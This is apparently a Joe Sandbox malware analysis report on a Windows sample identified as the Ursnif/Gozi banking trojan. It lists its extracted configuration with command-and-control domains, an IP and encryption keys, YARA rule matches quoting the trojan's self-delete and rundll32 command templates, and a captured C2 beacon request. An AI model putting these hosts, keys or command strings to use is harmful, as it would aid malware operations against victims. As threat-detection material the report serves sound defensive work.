Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
d2ef5.exe

Overview

General Information

Sample Name:d2ef5.exe
Analysis ID:730728
MD5:1d8a445bef0c0d4a7ec519f06c23224a
SHA1:7dd349b8664ec7dbe769da64e1b324ae091a29e2
SHA256:e807c46ba7cd53bf6900d1a8f32baba9a118410483faa68d51b233de738483e3
Tags:exe
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected Ursnif
Found evasive API chain (may stop execution after checking system information)
Writes or reads registry keys via WMI
Writes registry values via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Uses a known web browser user agent for HTTP communication
Internet Provider seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware

Classification

  • System is w10x64
  • d2ef5.exe (PID: 4684 cmdline: C:\Users\user\Desktop\d2ef5.exe MD5: 1D8A445BEF0C0D4A7EC519F06C23224A)
  • cleanup
{"RSA Public Key": "GM4Kf/Z6rOnx7ZeOHNCGqGU1EYR+rHVcPFJfnB66sRxq8TdAtJ8I/FA73jILYN/O7GBQZXfAayteZ+p+Oku4j4TsVhRTMO69ts5LXnUBL3YpRQLuom+BvNzXjhoKt16kcxpwisrVl8sSl78o2iV+WuT7m9YMZQozEdttRTBIHJpzQtPr0h5BHHk+OiA9EQSDmlX7UvBgY8bViZ8LVgRE2j8GEgfNQW2WNlu1n810ZdnxshlFew+L2+9Be0oR+u+GXheI+qCLyYBkG5dNS0/RoFfmz5khmlLokQND0e2gq8+13HHHxrou4IGiYjMoDNLBLxynxiy1GeKRmyNpR0hR7RNZZpmu8ADCXrY93ygL4yQ=", "c2_domain": ["trackingg-protectioon.cdn1.mozilla.net", "siwdmfkshsgw.com", "trackingg-protectioon.cdn1.mozilla.net", "188.127.224.114", "weiqeqwns.com", "weiqeqwens.com", "weiqewqwns.com", "iujdhsndjfks.com", "ijduwhsbvk.com"], "botnet": "10103", "server": "50", "serpent_key": "9wGFk6w5pVKRz0Hz", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
SourceRuleDescriptionAuthorStrings
00000000.00000003.441282479.00000000015F8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000003.441282479.00000000015F8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
    • 0xff0:$a1: /C ping localhost -n %u && del "%s"
    • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
    • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
    • 0xca8:$a5: filename="%.4u.%lu"
    • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xe72:$a9: &whoami=%s
    • 0xe5a:$a10: %u.%u_%u_%u_x%u
    • 0xc22:$a11: size=%u&hash=0x%08x
    • 0xc13:$a12: &uptime=%u
    • 0xda7:$a13: %systemroot%\system32\c_1252.nls
    • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
    00000000.00000003.441282479.00000000015F8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_261f5ac5unknownunknown
    • 0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
    • 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
    • 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
    • 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\
    • 0x1868:$a9: Software\AppDataLow\Software\Microsoft\
    00000000.00000003.441258936.00000000015F8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000000.00000003.441258936.00000000015F8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
      • 0xff0:$a1: /C ping localhost -n %u && del "%s"
      • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
      • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
      • 0xca8:$a5: filename="%.4u.%lu"
      • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
      • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xe72:$a9: &whoami=%s
      • 0xe5a:$a10: %u.%u_%u_%u_x%u
      • 0xc22:$a11: size=%u&hash=0x%08x
      • 0xc13:$a12: &uptime=%u
      • 0xda7:$a13: %systemroot%\system32\c_1252.nls
      • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
      Click to see the 26 entries
      SourceRuleDescriptionAuthorStrings
      0.2.d2ef5.exe.420000.1.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
        0.2.d2ef5.exe.10194a0.2.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
          No Sigma rule has matched
          Timestamp:192.168.2.4194.58.112.17449695802033203 10/26/22-08:31:08.563638
          SID:2033203
          Source Port:49695
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4194.58.112.17449695802033204 10/26/22-08:31:08.563638
          SID:2033204
          Source Port:49695
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: d2ef5.exeAvira: detected
          Source: d2ef5.exeReversingLabs: Detection: 88%
          Source: d2ef5.exeJoe Sandbox ML: detected
          Source: 0.2.d2ef5.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
          Source: 0.0.d2ef5.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
          Source: d2ef5.exeMalware Configuration Extractor: Ursnif {"RSA Public Key": "GM4Kf/Z6rOnx7ZeOHNCGqGU1EYR+rHVcPFJfnB66sRxq8TdAtJ8I/FA73jILYN/O7GBQZXfAayteZ+p+Oku4j4TsVhRTMO69ts5LXnUBL3YpRQLuom+BvNzXjhoKt16kcxpwisrVl8sSl78o2iV+WuT7m9YMZQozEdttRTBIHJpzQtPr0h5BHHk+OiA9EQSDmlX7UvBgY8bViZ8LVgRE2j8GEgfNQW2WNlu1n810ZdnxshlFew+L2+9Be0oR+u+GXheI+qCLyYBkG5dNS0/RoFfmz5khmlLokQND0e2gq8+13HHHxrou4IGiYjMoDNLBLxynxiy1GeKRmyNpR0hR7RNZZpmu8ADCXrY93ygL4yQ=", "c2_domain": ["trackingg-protectioon.cdn1.mozilla.net", "siwdmfkshsgw.com", "trackingg-protectioon.cdn1.mozilla.net", "188.127.224.114", "weiqeqwns.com", "weiqeqwens.com", "weiqewqwns.com", "iujdhsndjfks.com", "ijduwhsbvk.com"], "botnet": "10103", "server": "50", "serpent_key": "9wGFk6w5pVKRz0Hz", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
          Source: d2ef5.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

          Networking

          barindex
          Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49695 -> 194.58.112.174:80
          Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49695 -> 194.58.112.174:80
          Source: global trafficHTTP traffic detected: GET /uploaded/pQRddRleZXP/sJg6GhFwZ0qmTC/meZE4SAXFSLuHXPcM_2FX/I4WPB1zBKUN7tcbv/VUX_2BXZPhSScwW/gPk8TGBKaZ5_2FVNf4/DQeVzjyY8/FEmgZVIU8bIRy_2Fy_2B/ldiKoh_2BMRhcwD6rsx/9uRA7vzxbfQ5nCWulzQQLg/RkGHi7DfmhmHl/i8REEpeY/pVP2haL0B_2FgslxWZs9c8a/fbu4j_2B3O/khl76mXAZINveCWsL/tlJp4SNzPxCO/Atw8nEb7TnS/YtJYMZTM8xwnaZ/S9ay0CGGR/2erETTDs/i5PM.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: siwdmfkshsgw.comConnection: Keep-AliveCache-Control: no-cache
          Source: Joe Sandbox ViewASN Name: AS-REGRU AS-REGRU
          Source: Joe Sandbox ViewIP Address: 194.58.112.174 194.58.112.174
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 26 Oct 2022 06:31:08 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 61 35 63 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 73 69 77 64 6d 66 6b 73 68 73 67 77 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2d 63 6f 6e 74 65 6e 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2d 63 6f 6e 74 65 6e 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2d 63 6f 6e 74 65 6e 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73
          Source: d2ef5.exe, 00000000.00000003.484854452.00000000015FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=siwdmfkshsgw.com&rand=
          Source: d2ef5.exe, 00000000.00000003.484862658.00000000015FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reg.ru
          Source: d2ef5.exe, 00000000.00000003.484854452.00000000015FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
          Source: d2ef5.exe, 00000000.00000003.484854452.00000000015FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=siwdmfkshsgw.com&utm_medium=parking&utm_campaign=s_land_ser
          Source: d2ef5.exe, 00000000.00000003.484854452.00000000015FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=siwdmfkshsgw.com&utm_medium=parking&utm_campaign=s_land_ne
          Source: d2ef5.exe, 00000000.00000003.484854452.00000000015FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=siwdmfkshsgw.com&utm_medium=parking&utm_campaign=s_land_host&
          Source: d2ef5.exe, 00000000.00000003.484845306.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, d2ef5.exe, 00000000.00000003.484854452.00000000015FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.reg.ru/support/ssl-sertifikaty/zakaz-ssl-sertifikata/Kak-zakazat-besplatny-SSL-sertifika
          Source: d2ef5.exe, 00000000.00000003.484854452.00000000015FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/?utm_source=siwdmfkshsgw.com&utm_medium=parking&utm_campaign=s_land_cms
          Source: d2ef5.exe, 00000000.00000003.484854452.00000000015FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=siwdmfkshsgw.com&utm_medium=parking&utm_cam
          Source: d2ef5.exe, 00000000.00000003.484862658.00000000015FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=siwdmfkshsgw.com&reg_source=parking_auto
          Source: unknownDNS traffic detected: queries for: trackingg-protectioon.cdn1.mozilla.net
          Source: global trafficHTTP traffic detected: GET /uploaded/pQRddRleZXP/sJg6GhFwZ0qmTC/meZE4SAXFSLuHXPcM_2FX/I4WPB1zBKUN7tcbv/VUX_2BXZPhSScwW/gPk8TGBKaZ5_2FVNf4/DQeVzjyY8/FEmgZVIU8bIRy_2Fy_2B/ldiKoh_2BMRhcwD6rsx/9uRA7vzxbfQ5nCWulzQQLg/RkGHi7DfmhmHl/i8REEpeY/pVP2haL0B_2FgslxWZs9c8a/fbu4j_2B3O/khl76mXAZINveCWsL/tlJp4SNzPxCO/Atw8nEb7TnS/YtJYMZTM8xwnaZ/S9ay0CGGR/2erETTDs/i5PM.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: siwdmfkshsgw.comConnection: Keep-AliveCache-Control: no-cache

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          barindex
          Source: Yara matchFile source: 00000000.00000003.441282479.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441258936.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441128955.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.440946252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441227319.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.569972070.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441026847.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441081684.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441301430.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: d2ef5.exe PID: 4684, type: MEMORYSTR
          Source: Yara matchFile source: 0.2.d2ef5.exe.420000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.d2ef5.exe.10194a0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.569687253.0000000001019000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 00000000.00000003.441282479.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441258936.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441128955.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.440946252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441227319.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.569972070.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441026847.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441081684.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441301430.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: d2ef5.exe PID: 4684, type: MEMORYSTR
          Source: Yara matchFile source: 0.2.d2ef5.exe.420000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.d2ef5.exe.10194a0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.569687253.0000000001019000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 00000000.00000003.441282479.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
          Source: 00000000.00000003.441282479.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
          Source: 00000000.00000003.441258936.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
          Source: 00000000.00000003.441258936.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
          Source: 00000000.00000003.441128955.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
          Source: 00000000.00000003.441128955.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
          Source: 00000000.00000003.440946252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
          Source: 00000000.00000003.440946252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
          Source: 00000000.00000003.441227319.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
          Source: 00000000.00000003.441227319.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
          Source: 00000000.00000002.569972070.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
          Source: 00000000.00000002.569972070.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
          Source: 00000000.00000003.441026847.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
          Source: 00000000.00000003.441026847.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
          Source: 00000000.00000003.441081684.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
          Source: 00000000.00000003.441081684.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
          Source: 00000000.00000003.441301430.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
          Source: 00000000.00000003.441301430.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
          Source: Process Memory Space: d2ef5.exe PID: 4684, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
          Source: Process Memory Space: d2ef5.exe PID: 4684, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
          Source: C:\Users\user\Desktop\d2ef5.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
          Source: C:\Users\user\Desktop\d2ef5.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
          Source: C:\Users\user\Desktop\d2ef5.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Users\user\Desktop\d2ef5.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Users\user\Desktop\d2ef5.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
          Source: C:\Users\user\Desktop\d2ef5.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Users\user\Desktop\d2ef5.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: d2ef5.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 00000000.00000003.441282479.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
          Source: 00000000.00000003.441282479.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
          Source: 00000000.00000003.441258936.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
          Source: 00000000.00000003.441258936.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
          Source: 00000000.00000003.441128955.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
          Source: 00000000.00000003.441128955.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
          Source: 00000000.00000003.440946252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
          Source: 00000000.00000003.440946252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
          Source: 00000000.00000003.441227319.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
